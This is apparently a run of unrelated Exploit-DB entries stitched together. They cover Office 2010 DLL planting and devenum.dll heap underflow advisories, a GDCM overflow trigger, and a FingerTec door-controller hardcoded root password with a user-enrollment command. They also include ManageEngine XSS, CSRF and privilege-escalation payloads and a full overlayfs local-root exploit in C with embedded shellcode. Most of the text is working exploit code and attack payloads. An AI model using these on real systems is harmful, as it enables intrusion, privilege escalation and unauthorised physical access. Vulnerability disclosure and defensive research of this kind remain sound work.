It is possible for an attacker to execute a DLL planting attack in Microsoft Office 2010 on Windows 7 x86 with a specially crafted OLE object. The attached POC document "planted-mfplat.doc" contains what was originally an embedded Packager object. The CLSID for this object was changed at offset 0x2650 to be {62dc1a93-ae24-464c-a43e-452f824c4250} (formatted as pack(">IHHBBBBBBBB")) which is one of several registered objects that have an InProcServer32 of WMALFXGFXDSP.dll. Other options include:
{637c490d-eee3-4c0a-973f-371958802da2}
{874131cb-4ecc-443b-8948-746b89595d20}
{96749377-3391-11D2-9EE3-00C04F797396}
When a user opens this document and single clicks on the icon for foo.txt ole32!OleLoad is invoked on our vulnerable CLSID. This results in a call to wmalfxgfxdsp!DllGetClassObject() which does a LoadLibraryW() call for "mfplat". If the attached mfplat.dll is placed in the same directory with the planted-mfplat.doc file you should see a popup coming from this DLL being loaded from the current working directory of Word.
Here is the call stack leading up to the vulnerable LoadLibraryW() call:
0:000> kb
ChildEBP RetAddr Args to Child
002c8d18 68f02e2f 68f02e70 68f013bc 003f0774 kernel32!LoadLibraryW
002c8d28 68f01ff4 00000000 002c93f4 003ff174 WMALFXGFXDSP!InitAVRTAlloc+0x58
002c8d3c 7660aec6 003f0764 00000000 002c8de4 WMALFXGFXDSP!DllGetClassObject+0x87
002c8d58 765e91cd 003f0764 7660ee84 002c8de4 ole32!CClassCache::CDllPathEntry::DllGetClassObject+0x30 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3324]
002c8d70 765e8e92 002c8d84 7660ee84 002c8de4 ole32!CClassCache::CDllFnPtrMoniker::BindToObjectNoSwitch+0x1f [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 3831]
002c8da8 765e8c37 002c8dec 00000000 002c93f4 ole32!CClassCache::GetClassObject+0x49 [d:\w7rtm\com\ole32\com\objact\dllcache.cxx @ 4582]
002c8e24 76603170 76706444 00000000 002c93f4 ole32!CServerContextActivator::CreateInstance+0x110 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 974]
002c8e64 765e8daa 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c8eb8 765e8d1f 7670646c 00000000 002c93f4 ole32!CApartmentActivator::CreateInstance+0x112 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 2268]
002c8ed8 765e8aa2 76706494 00000001 00000000 ole32!CProcessActivator::CCICallback+0x6d [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1737]
002c8ef8 765e8a53 76706494 002c9250 00000000 ole32!CProcessActivator::AttemptActivation+0x2c [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1630]
002c8f34 765e8e0d 76706494 002c9250 00000000 ole32!CProcessActivator::ActivateByContext+0x4f [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1487]
002c8f5c 76603170 76706494 00000000 002c93f4 ole32!CProcessActivator::CreateInstance+0x49 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 1377]
002c8f9c 76602ef4 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c91fc 76603170 76706448 00000000 002c93f4 ole32!CClientContextActivator::CreateInstance+0xb0 [d:\w7rtm\com\ole32\com\objact\actvator.cxx @ 685]
002c923c 76603098 002c93f4 00000000 002c995c ole32!ActivationPropertiesIn::DelegateCreateInstance+0x108 [d:\w7rtm\com\ole32\actprops\actprops.cxx @ 1917]
002c9a10 76609e25 002c9b2c 00000000 00000403 ole32!ICoCreateInstanceEx+0x404 [d:\w7rtm\com\ole32\com\objact\objact.cxx @ 1334]
002c9a70 76609d86 002c9b2c 00000000 00000403 ole32!CComActivator::DoCreateInstance+0xd9 [d:\w7rtm\com\ole32\com\objact\immact.hxx @ 343]
002c9a94 76609d3f 002c9b2c 00000000 00000403 ole32!CoCreateInstanceEx+0x38 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 157]
002c9ac4 7662154c 002c9b2c 00000000 00000403 ole32!CoCreateInstance+0x37 [d:\w7rtm\com\ole32\com\objact\actapi.cxx @ 110]
002c9b40 7661f2af 62dc1a93 464cae24 2f453ea4 ole32!wCreateObject+0x106 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 3046]
002c9ba4 7661f1d4 06370820 00000000 5f3363a8 ole32!OleLoadWithoutBinding+0x9c [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1576]
002c9bcc 611483bf 06370820 5f3363a8 045d86e0 ole32!OleLoad+0x37 [d:\w7rtm\com\ole32\ole232\base\create.cpp @ 1495]
WARNING: Stack unwind information not available. Following frames may be wrong.
002c9c40 5f7c3973 06370820 5f3363a8 045d86e0 mso!Ordinal2023+0x7c
002c9c8c 5f7c3881 036fe800 06370820 5f3363a8 wwlib!DllGetLCID+0x46e24d
This DLL load can be triggered without user interaction with the following RTF document:
{\rtf1{\object\objemb{\*\objclass None}{\*\oleclsid \'7b62dc1a93-ae24-464c-a43e-452f824c4250\'7d}{\*\objdata 010500000100000001000000000000000000000000000000000000000000000000000000000000000000000000}}}
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39233.zip
Source: https://code.google.com/p/google-security-research/issues/detail?id=594
Heap corruption buffer underflow in devenum.dll!DeviceMoniker::Load()
There exists a buffer underflow vulnerability in devenum.dll!DeviceMoniker::Load when attempting to null terminate a user supplied string. The function as it exists on Windows 7 x86 is implemented as follows:
signed int __stdcall CDeviceMoniker::Load(CDeviceMoniker *this, struct IStream *a2)
{
struct IStream *v2; // esi@1
signed int v3; // edi@1
const unsigned __int16 *v4; // ebx@2
char v6; // [sp+8h] [bp-4h]@1
v2 = a2;
v3 = a2->lpVtbl->Read(a2, &a2, 4, (ULONG *)&v6); // read a 4 byte user controlled length
if ( v3 >= 0 )
{
v4 = (const unsigned __int16 *)operator new[]((unsigned int)a2); // allocate length
if ( v4 )
{
v3 = v2->lpVtbl->Read(v2, (void *)v4, (ULONG)a2, (ULONG *)&v6); // read data into new buffer
if ( v3 >= 0 )
{
v4[((unsigned int)a2 >> 1) - 1] = 0; // BAD BAD BAD
v3 = CDeviceMoniker::Init(this, v4);
}
operator delete[]((void *)v4);
}
else
{
v3 = -2147024882;
}
}
return v3;
}
The issue comes in when we specify a length of 1 with the first read. A buffer of length 1 will be allocated and 1 byte will be read into it. But, when the code goes to NULL terminate this buffer it divides the length by 2 and subtracts 2 (v4 is a wchar_t) leading to "\x00\x00" being written 2 bytes before the allocated buffer.
This object "device.1" or {4315D437-5B8C-11D0-BD3B-00A0C911CE86} is reachable from any bit of software that performs an IPersistStream::Load on an arbritrary object. This vulnerable object is also reachable from any bit of software performing an OleLoad(IID_IOleObject) call with an with an attacker controlled CLSID -- as is the case in Office.
In the attached Word Document PoC the OLE object StdObjLink or {00000300-0000-0000-c000-000000000046} is embedded with data pointing to the device.1 object. The StdObjLink supports IOleObject and IPersistStorage interfaces. When a user single clicks the object in the document an OleLoad call will load the StdObjLink object and call its IPersistStorage::Load (ole32!CDefLink::Load()) method. StdObjLink will then read the device.1 CLSID from the \x01Ole stream and call OleLoadFromStream with an interface ID of IMoniker. This call will then result in device.1 being loaded and the IPersistStream::Load() (devenum!DeviceMoniker::Load()) method being called.
The DeviceMoniker::Load() method should limit the user supplied size to sane values that are 2 byte aligned.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39232.zip
/*
Grassroots DICOM (GDCM) is a C++ library for processing DICOM medical
images.
It provides routines to view and manipulate a wide range of image formats
and can be accessed through many popular programming languages like Python,
C#, Java and PHP.
GDCM versions 2.6.0 and 2.6.1 (and possibly previous versions) are prone
to an
integer overflow vulnerability which leads to a buffer overflow and
potentially to remote code execution. The vulnerability is triggered by the
exposed function gdcm::ImageRegionReader::ReadIntoBuffer, which copies
DICOM
image data to a buffer. ReadIntoBuffer checks whether the supplied
buffer is
large enough to hold the necessary data, however in this check it fails to
detect the occurrence of an integer overflow, which leads to a buffer
overflow
later on in the code. The buffer overflow will occur regardless of the
size of
the buffer supplied to the ReadIntoBuffer call.
More information about this vulnerability can be found at
http://census-labs.com/news/2016/01/11/gdcm-buffer-overflow-imageregionreaderreadintobuffer/
The GDCM project has released version 2.6.2 that addresses this issue.
It is advised to upgrade all GDCM installations to the latest stable
release.
Disclosure Timeline
-------------------
CVE assignment: December 2nd, 2015
Vendor Contact: December 4th, 2015
Vendor Patch Release: December 23rd, 2015
Public Advisory: January 11th, 2016
*/
#include "gdcmReader.h"
#include "gdcmImageReader.h"
#include "gdcmImageRegionReader.h"
#include "gdcmBoxRegion.h"
#include "gdcmImageHelper.h"
#include <iostream>
using namespace std;
/*
* A simple demonstration of CVE-2015-8396
* by Stelios Tsampas (stelios at census-labs.com)
* based on http://gdcm.sourceforge.net/html/ExtractImageRegion_8cs-example.html
*
* Compiles with:
* $ g++ -I/usr/include/gdcm-2.6 -o CVE-2015-8396-trigger CVE-2015-8396-trigger.cpp -lgdcmCommon -lgdcmMSFF -lgdcmDSED
*
* Try it on http://census-labs.com/media/CVE-2015-8396.dcm.bz2
* https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39229.zip
* $ bzip2 -d CVE-2015-8396.dcm.bz2
* $ ./CVE-2015-8396-trigger CVE-2015-8396.dcm
*/
int main(int argc, char *argv [])
{
char buffer[2048 * 2047];
gdcm::ImageRegionReader reader;
gdcm::BoxRegion box;
if (argc < 2) {
cout << "Usage: example <input-file>\n";
return 1;
}
const char *filename = argv[1];
reader.SetFileName(filename);
if (!reader.ReadInformation()) {
cout << "No info from file\n";
return 1;
}
std::vector<unsigned int> dims = gdcm::ImageHelper::GetDimensionsValue(reader.GetFile());
cout << "x: " << dims[0] << ", y: " << dims[1] << ", z: " << dims[2] << "\n";
box.SetDomain(0, dims[0] - 1, 0, dims[1] - 1, 0, dims[2] - 1);
reader.SetRegion(box);
reader.ReadIntoBuffer(buffer, sizeof(buffer));
return 0;
}
# Exploit Title: Default Root Password and Remote Enrollment on FingerTec Devices
# Date: 12-01-2016
# Exploit Author: Daniel Lawson
# Contact: http://twitter.com/fang0654
# Website: https://digital-panther.com
# Category: physical access control
1. Description
Almost all FingerTec Access Control devices are running with open telnet, with a hardcoded default root password. Additionally, it is trivial to enroll a new administrative user on the device with a pin code or RFID card that will allow opening the door.
2. Proof of Concept
Login to telnet with the credentials: root / founder88
At the console type in the command:
echo -n -e \\\\x39\\\\x5\\\\x6\\\\x31\\\\x32\\\\x33\\\\x34\\\\x35\\\\x48\\\\x61\\\\x78\\\\x78\\\\x30\\\\x72\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x0\\\\x1\\\\x0\\\\x0\\\\x39\\\\x5\\\\x0\\\\x0 >> user.dat
This will create a user named Haxx0r with an id of 1337 and a pin of 12345.
---
Daniel Lawson
Digital Panther Security
https://digital-panther.com
Manage Engine Applications Manager 12 Multiple Vulnerabilities
[Vendor Product Description]
- ManageEngine Applications Manager is an application performance monitoring solution that proactively monitors
business applications and help businesses ensure their revenue-critical applications meet end user expectations.
Applications Manager offers out-of-the-box monitoring support for 50+ applications and servers.
- Site: https://www.manageengine.com/
[Advisory Timeline]
- 22/10/2015 -> First Contact to Vendor;
- 23/10/2015 -> Vendor responded asking for details;
- 23/10/2015 -> Advisory & Details sent to vendor;
- 03/11/2015 -> Follow up with the vendor. No response received;
- 06/11/2015 -> Second follow up with the vendor. No response received;
- 22/12/2015 -> Final follow up with the vendor. No response received;
- 13/01/2016 -> Public security advisory released;
[Bug Summary]
- Cross Site Scripting (Stored) (CVE-ID Requested)
- Cross Site Request Forgery (CSRF) (CVE-ID Requested)
- Privilege Escalation (CVE-ID Requested)
[Impact]
- High
[Affected Version]
- Applications Manager 12
[Advisory]
- ZSL-2016-5292
- http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5292.php
[Bug Description and Proof of Concept]
1. Cross-Site Request Forgery (CSRF) - The application allows users to perform certain actions via HTTP requests
without performing any validity checks to verify the requests. This can be exploited to perform certain actions
with administrative privileges if a logged-in user visits a malicious web site
https://en.wikipedia.org/wiki/Cross-site_request_forgery
2. Cross Site Scripting (XSS) - Multiple cross-site scripting vulnerabilities were also discovered. The issue is
triggered when input passed via the multiple parameters is not properly sanitized before being returned to the user.
This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
https://en.wikipedia.org/wiki/Cross-site_scripting
3. Vertical Privilege Escalation - Applications Manager 12 suffers from a privilege escalation issue. Normal user can elevate his/her
privileges by modifying a GET request seting the parameter 'username' to 'admin'. Attacker can exploit this issue using also
cross-site request forgery attacks.
https://en.wikipedia.org/wiki/Privilege_escalation
[Proof-of-Concept]
1. Multiple Stored Cross Site Scripting
Parameter:
description (POST)
Payload:
option=org.apache.struts.taglib.html.TOKEN=05b70e70fce2ede0d6efc8aef01b1519&addmonitors=0&name=%3Cscript%3Ealert%285%29%3C%2Fscript%3E&description=%3Cscript%3Ealert%28%27XSS%27%29%3C%2Fscript%3E&allowners_list=1&grouptype=1&createMV=createMV&mgtypestatus%231001=on&mgtypes_1001=1&mgtypes_1007=0&mgtypes_1008=0&mgtypestatus%231002=on&mgtypes_1002=1&mgtypestatus%231003=on&mgtypes_1003=1&mgtypestatus%231004=on&mgtypes_1004=1&mgtypestatus%231006=on&mgtypes_1006=1&locationid=1
Parameters:
leftexp1, rightexp1, leftexp2, rightexp2 (POST)
Payload: haid=null&method=editAnomalyProfileAction&id=0&secondarycriticalexist=false&secondarywarningexist=false&secondaryinfoexist=false&select=thresholdNumeric&displayname=&criticalthresholdcondition=GT&criticalthresholdvalue=5&criticalconditionjoiner=OR&secondarycriticalthresholdcondition=GT&secondarycriticalthresholdvalue=5&criticalthresholdmessage=Critical+Alarm+Message&consecutive_mincriticalpolls=Use+global+defaults&consecutive_criticalpolls=Use+global+defaults&warningthresholdcondition=EQ&warningthresholdvalue=5&warningconditionjoiner=OR&secondarywarningthresholdcondition=EQ&secondarywarningthresholdvalue=5&warningthresholdmessage=Warning+Alarm+Message&consecutive_minwarningpolls=Use+global+defaults&consecutive_warningpolls=Use+global+defaults&infothresholdcondition=LT&infothresholdvalue=5&infoconditionjoiner=OR&secondaryinfothresholdcondition=LT&secondaryinfothresholdvalue=5&infothresholdmessage=Clear+Alarm+message&consecutive_minclearpolls=Use+global+defaults&consecutive_clearpolls=
Use+global+defaults&description=&cancel=true&percentagevalue=1&anomalyId=10000001&anomalyName=%26lt%3Bscript%26gt%3Balert%26%2340%3B1%29%26lt%3B%2Fscript%26gt%3B&baseformulaType=0&baselineType=1&baseWeek=1&monthYears=8-2015&higherPercentage=1&higherValue=20&alarmType=1&lowerValue=30&loweralarmType=4&sendmail=0&comparisonType=1&leftexp1=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&leftselect=%3E&rightexp1=%3Cscript%3Ealert%283%29%3C%2Fscript%3E&alarmTypeExpression=1&leftexp2=%3Cscript%3Ealert%284%29%3C%2Fscript%3E&rightselect=%3E&rightexp2=%3Cscript%3Ealert%285%29%3C%2Fscript%3E&loweralarmTypeExpression=4&anomalymethod=editAnomalyProfileAction&cancel1=true
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
2. Multiple Cross Site Request Forgery (CSRF)
Sample Payload for executing command:
<html>
<body>
<form action="http://localhost:9090/common/executeScript.do">
<input type="hidden" name="method" value="testAction" />
<input type="hidden" name="actionID" value="10000010" />
<input type="hidden" name="haid" value="null" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
3. Privilege Escalation on userconfiguration.do (Become an Admin)
Parameter:
username (GET)
Payload:
[Original]
http://localhost:9090/userconfiguration.do?method=editUser&username=test1&userid=10000003
[Escalated Privileges]
http://localhost:9090/userconfiguration.do?method=editUser&username=admin&userid=10000003
++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
All flaws described here were discovered and researched by:
Bikramaditya Guha aka "PhoenixX"
********************************************************************************************************************************************************************************************************************************
/** This software is provided by the copyright owner "as is" and any
* expressed or implied warranties, including, but not limited to,
* the implied warranties of merchantability and fitness for a particular
* purpose are disclaimed. In no event shall the copyright owner be
* liable for any direct, indirect, incidential, special, exemplary or
* consequential damages, including, but not limited to, procurement
* of substitute goods or services, loss of use, data or profits or
* business interruption, however caused and on any theory of liability,
* whether in contract, strict liability, or tort, including negligence
* or otherwise, arising in any way out of the use of this software,
* even if advised of the possibility of such damage.
*
* Copyright (c) 2015 halfdog <me (%) halfdog.net>
*
* This program demonstrates how to escalate privileges using
* an overlayfs mount within a user namespace. See
* http://www.halfdog.net/Security/2015/UserNamespaceOverlayfsSetuidWriteExec/
* for more information.
*
* gcc -o UserNamespaceOverlayfsSetuidWriteExec UserNamespaceOverlayfsSetuidWriteExec.c
*
* Usage: UserNamespaceOverlayfsSetuidWriteExec -- [program] [args]
*
*/
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <sched.h>
#include <sys/stat.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/mount.h>
#include <sys/resource.h>
#include <sys/wait.h>
#include <unistd.h>
extern char **environ;
static int childFunc(void *arg) {
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
while(geteuid()!=0) {
usleep(100);
}
fprintf(stderr, "euid: %d, egid: %d\n", geteuid(), getegid());
int result=mount("overlayfs", "/tmp/x/bin", "overlayfs", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/x/over,workdir=/tmp/x/bin");
if(result) {
fprintf(stderr, "Overlay mounting failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
chdir("/tmp/x/bin");
result=chmod("su", 04777);
if(result) {
fprintf(stderr, "Mode change failed\n");
return(1);
}
fprintf(stderr, "Namespace helper waiting for modification completion\n");
struct stat statBuf;
char checkPath[128];
sprintf(checkPath, "/proc/%d", getppid());
while(1) {
usleep(100);
result=stat(checkPath, &statBuf);
if(result) {
fprintf(stderr, "Namespacer helper: parent terminated\n");
break;
}
// Wait until parent has escalated.
if(statBuf.st_uid) break;
}
chdir("/");
umount("/tmp/x/bin");
unlink("/tmp/x/over/su");
rmdir("/tmp/x/over");
rmdir("/tmp/x/bin/work");
rmdir("/tmp/x/bin");
rmdir("/tmp/x/");
fprintf(stderr, "Namespace part completed\n");
return(0);
}
#define STACK_SIZE (1024 * 1024)
static char child_stack[STACK_SIZE];
int main(int argc, char *argv[]) {
int argPos;
int result;
char *targetSuidPath="/bin/su";
char *helperSuidPath="/bin/mount";
for(argPos=1; argPos<argc; argPos++) {
char *argName=argv[argPos];
if(!strcmp(argName, "--")) {
argPos++;
break;
}
if(strncmp(argName, "--", 2)) {
break;
}
fprintf(stderr, "%s: unknown argument %s\n", argv[0], argName);
exit(1);
}
mkdir("/tmp/x", 0700);
mkdir("/tmp/x/bin", 0700);
mkdir("/tmp/x/over", 0700);
// Create child; child commences execution in childFunc()
// CLONE_NEWNS: new mount namespace
// CLONE_NEWPID
// CLONE_NEWUTS
pid_t pid=clone(childFunc, child_stack+STACK_SIZE,
CLONE_NEWUSER|CLONE_NEWNS|SIGCHLD, argv+argPos);
if(pid==-1) {
fprintf(stderr, "Clone failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
char idMapFileName[128];
char idMapData[128];
sprintf(idMapFileName, "/proc/%d/setgroups", pid);
int setGroupsFd=open(idMapFileName, O_WRONLY);
if(setGroupsFd<0) {
fprintf(stderr, "Failed to open setgroups\n");
return(1);
}
result=write(setGroupsFd, "deny", 4);
if(result<0) {
fprintf(stderr, "Failed to disable setgroups\n");
return(1);
}
close(setGroupsFd);
sprintf(idMapFileName, "/proc/%d/uid_map", pid);
fprintf(stderr, "Setting uid map in %s\n", idMapFileName);
int uidMapFd=open(idMapFileName, O_WRONLY);
if(uidMapFd<0) {
fprintf(stderr, "Failed to open uid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getuid());
result=write(uidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "UID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(uidMapFd);
sprintf(idMapFileName, "/proc/%d/gid_map", pid);
fprintf(stderr, "Setting gid map in %s\n", idMapFileName);
int gidMapFd=open(idMapFileName, O_WRONLY);
if(gidMapFd<0) {
fprintf(stderr, "Failed to open gid map\n");
return(1);
}
sprintf(idMapData, "0 %d 1\n", getgid());
result=write(gidMapFd, idMapData, strlen(idMapData));
if(result<0) {
fprintf(stderr, "GID map write failed: %d (%s)\n", errno, strerror(errno));
return(1);
}
close(gidMapFd);
// Wait until /tmp/x/over/su exists
struct stat statBuf;
while(1) {
usleep(100);
result=stat("/tmp/x/over/su", &statBuf);
if(!result) break;
}
// Overwrite the file
sprintf(idMapFileName, "/proc/%d/cwd/su", pid);
// No slashes allowed, everything else is OK.
char suidExecMinimalElf[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x80, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0xf8, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x02, 0x00, 0x28, 0x00,
0x05, 0x00, 0x04, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0xa2, 0x00, 0x00, 0x00,
0xa2, 0x00, 0x00, 0x00, 0x05, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x01, 0x00, 0x00, 0x00, 0xa4, 0x00, 0x00, 0x00, 0xa4, 0x90, 0x04, 0x08,
0xa4, 0x90, 0x04, 0x08, 0x09, 0x00, 0x00, 0x00, 0x09, 0x00, 0x00, 0x00,
0x06, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x31, 0xc0, 0x89, 0xc8,
0x89, 0xd0, 0x89, 0xd8, 0x04, 0xd2, 0xcd, 0x80,
0x31, 0xc0, 0x04, 0xd0, 0xcd, 0x80,
0x31, 0xc0, 0x89, 0xd0,
0xb0, 0x0b, 0x89, 0xe1, 0x83, 0xc1, 0x08, 0x8b, 0x19, 0xcd, 0x80
};
char *helperArgs[]={"/bin/mount", NULL};
int destFd=open(idMapFileName, O_RDWR|O_CREAT|O_TRUNC, 07777);
if(destFd<0) {
fprintf(stderr, "Failed to open %s, error %s\n", idMapFileName, strerror(errno));
return(1);
}
char *suidWriteNext=suidExecMinimalElf;
char *suidWriteEnd=suidExecMinimalElf+sizeof(suidExecMinimalElf);
while(suidWriteNext!=suidWriteEnd) {
char *suidWriteTestPos=suidWriteNext;
while((!*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
// We cannot write any 0-bytes. So let seek fill up the file wihh
// null-bytes for us.
lseek(destFd, suidWriteTestPos-suidExecMinimalElf, SEEK_SET);
suidWriteNext=suidWriteTestPos;
while((*suidWriteTestPos)&&(suidWriteTestPos!=suidWriteEnd))
suidWriteTestPos++;
pid_t helperPid=fork();
if(!helperPid) {
struct rlimit limits;
// We can't truncate, that would remove the setgid property of
// the file. So make sure the SUID binary does not write too much.
limits.rlim_cur=suidWriteTestPos-suidExecMinimalElf;
limits.rlim_max=limits.rlim_cur;
setrlimit(RLIMIT_FSIZE, &limits);
// Do not rely on some SUID binary to print out the unmodified
// program name, some OSes might have hardening against that.
// Let the ld-loader will do that for us.
limits.rlim_cur=1<<22;
limits.rlim_max=limits.rlim_cur;
result=setrlimit(RLIMIT_AS, &limits);
dup2(destFd, 1);
dup2(destFd, 2);
helperArgs[0]=suidWriteNext;
execve(helperSuidPath, helperArgs, NULL);
fprintf(stderr, "Exec failed\n");
return(1);
}
waitpid(helperPid, NULL, 0);
suidWriteNext=suidWriteTestPos;
}
close(destFd);
execve(idMapFileName, argv+argPos-1, NULL);
fprintf(stderr, "Failed to execute %s: %d (%s)\n", idMapFileName,
errno, strerror(errno));
return(1);
}